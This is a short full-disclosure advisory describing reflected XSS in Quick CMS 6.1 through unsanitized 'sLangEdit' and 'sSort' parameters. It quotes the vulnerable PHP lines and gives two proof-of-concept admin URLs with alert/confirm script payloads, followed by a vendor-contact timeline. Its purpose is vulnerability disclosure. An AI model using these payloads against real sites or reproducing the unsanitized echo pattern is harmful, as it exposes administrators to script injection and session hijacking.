Quick CMS v 6.1 XSS Vulnerability

## FULL DISCLOSURE

#Product    : Quick CMS
#Exploit Author  : Rahul Pratap Singh
#Version    : 6.1
#Home page Link  : http://opensolution.org/home.html
#Website  : 0x62626262.wordpress.com
#Linkedin  : https://in.linkedin.com/in/rahulpratapsingh94
#Date        : 19/Jan/2016

XSS Vulnerability:

—————————————-
Description:
—————————————-

 “sLangEdit” and “sSort” parameters are not sanitized that leads to Reflected XSS.

—————————————-
Vulnerable Code:
—————————————-

File Name: languages.php
Found at line:23

<h1><?php echo $lang[‘Languages’].( isset( $_GET[‘sLangEdit’] ) ? ‘ ‘.$_GET[‘sLangEdit’] : null ); ?></h1>

File Name: pages.php
Found at line:49

<form action=”?p=pages<?php if( isset( $_GET[‘sSort’] ) ) echo ‘&amp;sSort=’.$_GET[‘sSort’]; ?>” name=”form” method=”post” class=”main-form”>

—————————————-
Exploit:
—————————————-
localhost/Quick.Cms_v6.1-en/admin.php?p=languages&sLangEdit=</h1><script >alert(“XSS”)</script ><h1>

localhost/Quick.Cms_v6.1-en/admin.php?p=pages&sSort=”><img%20src=x%20onerror=confirm(1)><!–

—————————————-
POC:
—————————————-

Quick.Cms v6.1xsspoc

Quick.Cms v6.1xsspoc2

Disclosure Timeline:
Tried to contact vendor via email  : 14/1/2016 ( email bounce back)
Tried to contact vendor via forum : 18/1/2016 (thread deleted, no response)

Public Disclosure: 19/1/2016

Advertisements